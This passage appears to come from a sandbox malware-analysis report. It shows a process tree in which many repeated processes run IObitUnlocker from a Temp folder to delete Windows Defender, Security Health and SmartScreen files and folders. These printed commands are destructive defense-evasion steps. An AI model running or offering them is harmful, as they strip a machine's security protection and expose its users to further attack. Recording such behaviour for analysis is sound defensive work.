Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 